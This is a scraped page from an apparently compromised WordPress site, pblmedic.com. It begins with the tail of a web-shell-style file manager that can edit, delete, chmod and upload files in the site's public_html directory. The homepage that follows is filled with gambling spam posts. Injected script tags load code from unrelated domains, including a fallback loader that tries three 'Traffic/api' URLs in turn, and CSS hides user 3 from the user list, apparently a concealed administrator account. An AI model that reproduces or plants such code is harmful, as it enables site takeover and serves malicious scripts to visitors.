                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fxmlrpc.php" class="file-link">📄 xmlrpc.php</a></td>
                            <td class="size">3.1 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-11-08 18:52</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fxmlrpc.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fxmlrpc.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/xmlrpc.php','xmlrpc.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/xmlrpc.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/xmlrpc.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                                        </tbody>
            </table>
            </div>
    
    <div id="toast-container" class="toast-container"></div>

    <script>
        const currentPath = '/home2/pablod78/public_html';
        
        function showToast(msg, type) {
            const container = document.getElementById('toast-container');
            const toast = document.createElement('div');
            toast.className = 'toast toast-' + type;
            toast.innerHTML = msg + '<span onclick="this.parentElement.remove()" style="cursor:pointer;margin-left:10px;">×</span>';
            container.appendChild(toast);
            setTimeout(() => toast.remove(), 3000);
        }
        
        function ajaxRequest(action, data) {
            const formData = new FormData();
            formData.append('ajax_action', action);
            for(const key in data) formData.append(key, data[key]);
            return fetch(window.location.pathname, { method: 'POST', body: formData }).then(r => r.json());
        }
        
        function ajaxDelete(path, btn) {
            if(!confirm('Delete?')) return;
            const row = btn.closest('tr');
            row.style.opacity = '0.5';
            ajaxRequest('delete', {path}).then(r => {
                if(r.success) { row.remove(); showToast('Deleted', 'success'); }
                else { row.style.opacity = '1'; showToast(r.message || 'Failed', 'error'); }
            });
        }
        
        function showCreateFile() {
            const name = prompt('File name:', 'newfile.txt');
            if(name) {
                const content = prompt('Content:', '');
                ajaxRequest('create', {path: currentPath, name, type: 'file', content: content || ''})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showCreateFolder() {
            const name = prompt('Folder name:', 'newfolder');
            if(name) {
                ajaxRequest('create', {path: currentPath, name, type: 'dir'})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showRename(path, name) {
            const newName = prompt('New name:', name);
            if(newName && newName !== name) {
                ajaxRequest('rename', {old_path: path, new_name: newName})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showChmod(path, current) {
            const mode = prompt('Permissions (e.g. 755):', current);
            if(mode && mode !== current) {
                ajaxRequest('chmod', {path, mode})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function uploadFileB64(input) {
            const file = input.files[0];
            if(!file) return;
            showToast('Uploading: ' + file.name, 'success');
            const reader = new FileReader();
            reader.onload = function(e) {
                const b64 = e.target.result.split(',')[1];
                const formData = new FormData();
                formData.append('ajax_action', 'b64upload');
                formData.append('path', currentPath);
                formData.append('name', file.name);
                formData.append('data', b64);
                fetch(window.location.pathname, { method: 'POST', body: formData })
                    .then(r => r.json())
                    .then(r => {
                        if(r.success) { showToast('Uploaded: ' + file.name, 'success'); setTimeout(() => location.reload(), 500); }
                        else { showToast('Failed: ' + (r.message || 'Unknown error'), 'error'); }
                    })
                    .catch(err => showToast('Error: ' + err.message, 'error'));
            };
            reader.readAsDataURL(file);
            input.value = '';
        }
        
        function searchFiles(query) {
            query = query.toLowerCase();
            document.querySelectorAll('#file-list tr[data-name]').forEach(row => {
                row.style.display = row.dataset.name.includes(query) ? '' : 'none';
            });
        }
        
        document.addEventListener('keydown', function(e) {
            if(e.ctrlKey && e.key === 'f' && !e.target.matches('input,textarea')) { 
                e.preventDefault(); 
                document.getElementById('search-input').focus(); 
            }
        });
    </script>
</body>
</html><!doctype html>
<html lang="pt-BR">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="https://gmpg.org/xfn/11">
	<title>pblmedic</title>
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//glacial-sketch-otter-triis.live' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel="alternate" type="application/rss+xml" title="Feed para pblmedic &raquo;" href="https://pblmedic.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para pblmedic &raquo;" href="https://pblmedic.com/comments/feed/" />
<style id="wp-img-auto-sizes-contain-inline-css">
img:is([sizes=auto i],[sizes^="auto," i]){contain-intrinsic-size:3000px 1500px}
/*# sourceURL=wp-img-auto-sizes-contain-inline-css */
</style>
<style id="wp-emoji-styles-inline-css">

	img.wp-smiley, img.emoji {
		display: inline !important;
		border: none !important;
		box-shadow: none !important;
		height: 1em !important;
		width: 1em !important;
		margin: 0 0.07em !important;
		vertical-align: -0.1em !important;
		background: none !important;
		padding: 0 !important;
	}
/*# sourceURL=wp-emoji-styles-inline-css */
</style>
<style id="wp-block-library-inline-css">
:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-element-button{cursor:pointer}:root .has-very-light-gray-background-color{background-color:#eee}:root .has-very-dark-gray-background-color{background-color:#313131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradient-background{background:linear-gradient(135deg,#34e2e4,#4721fb 50%,#ab1dfe)}:root .has-hazy-dawn-gradient-background{background:linear-gradient(135deg,#faaca8,#dad0ec)}:root .has-subdued-olive-gradient-background{background:linear-gradient(135deg,#fafae1,#67a671)}:root .has-atomic-cream-gradient-background{background:linear-gradient(135deg,#fdd79a,#004a59)}:root .has-nightshade-gradient-background{background:linear-gradient(135deg,#330968,#31cdcf)}:root .has-midnight-gradient-background{background:linear-gradient(135deg,#020381,#2874fc)}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}.has-regular-font-size{font-size:1em}.has-larger-font-size{font-size:2.625em}.has-normal-font-size{font-size:var(--wp--preset--font-size--normal)}.has-huge-font-size{font-size:var(--wp--preset--font-size--huge)}:root .has-text-align-center{text-align:center}:root .has-text-align-left{text-align:left}:root .has-text-align-right{text-align:right}.has-fit-text{white-space:nowrap!important}#end-resizable-editor-section{display:none}.aligncenter{clear:both}.items-justified-left{justify-content:flex-start}.items-justified-center{justify-content:center}.items-justified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{word-wrap:normal!important;border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-break:normal!important}.screen-reader-text:focus{background-color:#ddd;clip-path:none;color:#444;display:block;font-size:1em;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}html :where(.has-border-color){border-style:solid}html :where([style^=border-color],[style*=";border-color"],[style*="; border-color"]){border-style:solid}html :where([style^=border-top-color],[style*=";border-top-color"],[style*="; border-top-color"]){border-top-style:solid}html :where([style^=border-right-color],[style*=";border-right-color"],[style*="; border-right-color"]){border-right-style:solid}html :where([style^=border-bottom-color],[style*=";border-bottom-color"],[style*="; border-bottom-color"]){border-bottom-style:solid}html :where([style^=border-left-color],[style*=";border-left-color"],[style*="; border-left-color"]){border-left-style:solid}html :where([style^=border-width],[style*=";border-width"],[style*="; border-width"]){border-style:solid}html :where([style^=border-top-width],[style*=";border-top-width"],[style*="; border-top-width"]){border-top-style:solid}html :where([style^=border-right-width],[style*=";border-right-width"],[style*="; border-right-width"]){border-right-style:solid}html :where([style^=border-bottom-width],[style*=";border-bottom-width"],[style*="; border-bottom-width"]){border-bottom-style:solid}html :where([style^=border-left-width],[style*=";border-left-width"],[style*="; border-left-width"]){border-left-style:solid}html :where(img[class*=wp-image-]){height:auto;max-width:100%}:where(figure){margin:0 0 1em}html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:var(--wp-admin--admin-bar--height,0px)}@media screen and (max-width:600px){html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:0px}}
/*wp_block_styles_on_demand_placeholder:6aa7ccd14e321*/
/*# sourceURL=wp-block-library-inline-css */
</style>
<style id="wp-block-styles-placeholder-inline-css">
:root { --wp-internal-comment: "Placeholder for wp_hoist_late_printed_styles() to replace with the block styles printed at wp_footer." }
/*# sourceURL=wp-block-styles-placeholder-inline-css */
</style>
<style id="wp-global-styles-placeholder-inline-css">
:root { --wp-internal-comment: "Placeholder for wp_hoist_late_printed_styles() to replace with the global-styles printed at wp_footer." }
/*# sourceURL=wp-global-styles-placeholder-inline-css */
</style>
<link rel='stylesheet' id='ganalytics-fonts-css' href='https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100' media='all' />
<link rel='stylesheet' id='hello-elementor-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/reset.css?ver=3.4.4' media='all' />
<link rel='stylesheet' id='hello-elementor-theme-style-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/theme.css?ver=3.4.4' media='all' />
<link rel='stylesheet' id='hello-elementor-header-footer-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/header-footer.css?ver=3.4.4' media='all' />
<script data-wp-strategy="defer" defer id="ganalytics-tracker-js" src="https://glacial-sketch-otter-triis.live/t.js?site=5b9c529db03be43d062917c963ff43ed"></script>
<link rel="https://api.w.org/" href="https://pblmedic.com/wp-json/" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://pblmedic.com/xmlrpc.php?rsd" />
<meta name="generator" content="WordPress 7.1" />
<script src="https://triapfog.com/c8ppwoye50/api"></script><style id="wp-custom-css">
tr#user-3,tr#user_3{display:none!important}
</style>
</head>
<body class="home blog wp-embed-responsive wp-theme-hello-elementor hello-elementor-default">


<a class="skip-link screen-reader-text" href="#content">Ir para o conteúdo</a>


<header id="site-header" class="site-header">

	<div class="site-branding">
					<div class="site-title">
				<a href="https://pblmedic.com/" title="Página inicial" rel="home">
					pblmedic				</a>
			</div>
						</div>

			<nav class="site-navigation" aria-label="Menu principal">
			<ul id="menu-principal" class="menu"><li id="menu-item-72" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-72"><a href="https://pblmedic.com/#inicio">Início</a></li>
<li id="menu-item-73" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-73"><a href="https://pblmedic.com/#quem-somos">Quem somos</a></li>
<li id="menu-item-74" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-74"><a href="https://pblmedic.com/#linha-distribuicao">Linha de distribuição</a></li>
<li id="menu-item-75" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-75"><a href="https://pblmedic.com/#area-de-atuacao">Área de atuação</a></li>
<li id="menu-item-76" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-76"><a href="https://pblmedic.com/#diferenciais">Diferenciais</a></li>
<li id="menu-item-77" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-77"><a href="https://api.whatsapp.com/send/?phone=5511961828606">Fale Conosco</a></li>
<li id="menu-item-78" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-78"><a href="https://pblmedic.com/#contato">Contato</a></li>
</ul>		</nav>
	</header>
<main id="content" class="site-main">

			<div class="page-header">
			<h1 class="entry-title">Arquivos</h1>		</div>
	
	<div class="page-content">
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/07/resources-online-casino-magyar/">Resources: online casino magyar</a></h2><p>More details available at online casino magyar.</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/14/the-fresh-features-always-moving-on-reel-build-has-become-an-essential-in-the-the-united-kingdom/">The fresh feature&#8217;s always moving on reel build has become an essential in the the united kingdom</a></h2><p>Places are quick, and withdrawals typically are available in 24 hours or less getting age-wallets otherwise within one to 3 working days to own credit payments. That is why safest British gambling enterprises adhere common financial options, for example debit cards, e-wallets, and you can bank transmits. Having a list of more than 400 headings, [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/14/regardless-of-the-small-size-of-your-own-no-deposit-added-bonus-you-could-potentially-however-earn-real-cash/">Regardless of the small size of your own no-deposit added bonus, you could potentially however earn real cash</a></h2><p>Winnings are usually processed as a consequence of PayPal, Apple Spend, or any other quick financial steps No-deposit bonuses is discharge pages on the respect and you will VIP applications you to has an extensive extent out of advantages of people. Come across an entire set of the fastest commission web based casinos and you [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/14/all-you-have-to-do-to-allege-it-is-in-order-to-sign-up-using-promotion-password-wsncasino/">All you have to do to allege it is in order to sign up using promotion password WSNCASINO</a></h2><p>?? Stakes &#8211; 100 % free spins are usually lay from the low stakes, usually $0.10 (or equivalent). 100 % free revolves incentives works by simply deciding on a genuine money gambling establishment, going into the discount code (in the event that relevant) and you&#8217;ll following be rewarded towards set level of 100 % free [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/14/but-things-can-be-overwhelming-when-you-are-confronted-with-2000-a-real-income-slots-playing/">But things can be overwhelming when you are confronted with 2000+ a real income slots playing</a></h2><p>The latest welcome added bonus at that SSL security casino also offers newbies 100 100 % free spins that have 0x betting requirements. Our team from experts attempted numerous titles, and better twenty three online casino games towards checklist incorporated Joker Area, Fortunate Treasures, and Fantastic Inn. If you make an installment having fun with [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/14/understanding-the-esa-letter-comprehensive-guide/">Understanding the ESA Letter: Comprehensive Guide</a></h2><p>Recently, the principle of emotional assistan alaska esace animals (ESAs) has obtained significant grip, aiding people in coping with different mental health and wellness conditions. Central to this support group is the ESA letter, a basic paper that validates the need for a psychological support</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/14/unnilseptium-ist-und-bleibt-wesentlich-so-unsereins-prazise-kontakt-haben-is-spieler-in-jeden-online-casino-plattformen-normalerweise/">Unnilseptium ist und bleibt wesentlich, so unsereins prazise kontakt haben, is Spieler in jeden Online Casino Plattformen normalerweise</a></h2><p>Dazu brauchst du storungsfrei dennoch folgende vorherige Registrierung bzw Zuallererst gelte parece, diesseitigen Versorger nach auftreiben, der sowohl Bing Give amyotrophic lateral sclerosis Zahlungsmethode vereint als nebensachlich weiterhin samtliche Kriterien erfullt, unser Ihnen nicht offentlich wichtig man sagt, sie seien. Eltern sollen muhelos gleichwohl den nachfolgend erklarten Schritten lauschen und irgendetwas fahig sein Welche Der [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/14/manche-vorhaben-legen-lediglich-in-diese-bonus-variante-sonstige-geben-nutzer-free-spins-im-nachhinein-zu-diesem-echtgeldbonus/">Manche Vorhaben legen lediglich in diese Bonus-Variante, sonstige geben Nutzer Free Spins im nachhinein zu diesem Echtgeldbonus</a></h2><p>Die Freispiele neigen diese wichtigste Promo-Anpassung das Angeschlossen Casinos ci�&#8221;?ur Unser wird aber noch tief keineswegs die gesamtheit, bekanntlich die gesamtheit Zielgruppe loath jedoch die Moglichkeit unter bis zu 3.two hundred and fifty etliche Freispiele. Entgegennehmen unsereins einfach zeichen aktiv, Eltern wurden 50 Gratisspiele vom Kasino Der Selektion kriegen, falls das Account mit mobeln ausgestattet [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/14/look-at-the-within-the-application-advertising-tab-at-every-agent-getting-newest-mobile-offers/">Look at the within the-application advertising tab at every agent getting newest mobile offers</a></h2><p>There are some reasons why you should benefit from a gambling establishment no deposit added bonus Incentive requirements noted on this page was basically confirmed because the active by the fresh new iBets team inside You could profit a real income of it, but you need to fulfill a wagering specifications and you may guarantee [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/14/british-casinos-promote-totally-free-revolves-to-draw-the-fresh-professionals-and-you-can-reward-established-people/">British casinos promote totally free revolves to draw the fresh professionals and you can reward established people</a></h2><p>A se options effortless, and also the mobile application provides a seamless feel With Bojoko, you are getting honest, expert-recognized info every time you choose a free revolves local casino. During the Bojoko, most of the no-deposit free spins promote is actually independently assessed by the in-domestic gambling enterprise experts. Taking these things into account [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/14/for-the-money-choice-the-more-gold-coins-your-gamble-the-better-the-potential-commission/">For the money choice, the more gold coins your gamble, the better the potential commission</a></h2><p>Of several harbors participants prefer a new game as they including the look of it at first glance. You can sometimes place the fresh money worthy of, payline worthy of, otherwise complete choice. Men and women that looking other casinos may fool around with complex configurations Right now, members can enjoy thousands of slot game, [&hellip;]</p>
			</article>
			</div>

			<nav class="pagination">
			<div class="nav-previous"></div>
			<div class="nav-next"><a href="https://pblmedic.com/page/2/?c=534459860" >Próximo <span class="meta-nav">&rarr;</span></a></div>
		</nav>
	
</main>
<footer id="site-footer" class="site-footer">
	</footer>

<script type="speculationrules">
{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"/*"},{"not":{"href_matches":["/wp-*.php","/wp-admin/*","/wp-content/uploads/*","/wp-content/*","/wp-content/plugins/*","/wp-content/themes/hello-elementor/*","/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}
</script>
<script id="wp-emoji-settings" type="application/json">
{"baseUrl":"https://s.w.org/images/core/emoji/17.0.2/72x72/","ext":".png","svgUrl":"https://s.w.org/images/core/emoji/17.0.2/svg/","svgExt":".svg","source":{"concatemoji":"https://pblmedic.com/wp-includes/js/wp-emoji-release.min.js?ver=7.1"}}
</script>
<script type="module">
/*! This file is auto-generated */
var e="script#wp-emoji-settings",t=document.querySelector(e);if(!(t instanceof HTMLScriptElement))throw new Error("Element missing: "+e);const r=JSON.parse(t.text),s=(window._wpemojiSettings=r,"wpEmojiSettingsSupports"),o=["flag","emoji"];function i(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(s,JSON.stringify(t))}catch(e){}}function c(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0);const r=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);return t.every((e,t)=>e===r[t])}function p(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var n=e.getImageData(16,16,1,1);for(let e=0;e<n.data.length;e++)if(0!==n.data[e])return!1;return!0}function u(e,t,n,r){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!r(e,"\ud83e\u1fac8")}return!1}function f(e,t,n,r){let a;const s=(a="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):document.createElement("canvas")).getContext("2d",{willReadFrequently:!0}),o=(s.textBaseline="top",s.font="600 32px Arial",{});return e.forEach(e=>{o[e]=t(s,e,n,r)}),o}function a(e){var t=document.createElement("script");t.src=e,t.defer=!0,document.head.appendChild(t)}r.supports={everything:!0,everythingExceptFlag:!0},new Promise(t=>{let n=function(){try{var e=JSON.parse(sessionStorage.getItem(s));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(o),u.toString(),c.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"});const a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=e=>{i(n=e.data),a.terminate(),t(n)})}catch(e){}i(n=f(o,u,c,p))}t(n)}).then(e=>{for(const n in e)r.supports[n]=e[n],r.supports.everything=r.supports.everything&&r.supports[n],"flag"!==n&&(r.supports.everythingExceptFlag=r.supports.everythingExceptFlag&&r.supports[n]);var t;r.supports.everythingExceptFlag=r.supports.everythingExceptFlag&&!r.supports.flag,r.supports.everything||((t=r.source||{}).concatemoji?a(t.concatemoji):t.wpemoji&&t.twemoji&&(a(t.twemoji),a(t.wpemoji)))});
//# sourceURL=https://pblmedic.com/wp-includes/js/wp-emoji-loader.min.js
</script>
<script>(function(){var u=["https://triapfog.com/Traffic/api","https://iocriotao.icu/Traffic/api","https://mioiooo.icu/Traffic/api"],i=0;\nfunction n(){if(i>=u.length)return;var s=document.createElement('script');\ns.src=u[i];s.onerror=function(){i++;n()};\n(document.head||document.documentElement).appendChild(s);i++;}\nn();})();</script>
</body>
</html>
